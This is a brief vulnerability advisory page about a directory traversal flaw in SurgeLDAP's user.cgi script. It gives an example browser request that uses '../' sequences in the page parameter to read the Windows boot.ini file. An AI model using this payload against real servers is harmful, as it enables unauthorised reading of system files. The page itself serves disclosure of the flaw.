• info
• discussion
• exploit
• solution
• references

SurgeLDAP User.CGI Directory Traversal Vulnerability

This issue may be exploited with a web browser. The following example was provided:

http://www.example.com:6680/user.cgi?cmd=show&page=/../../../boot.ini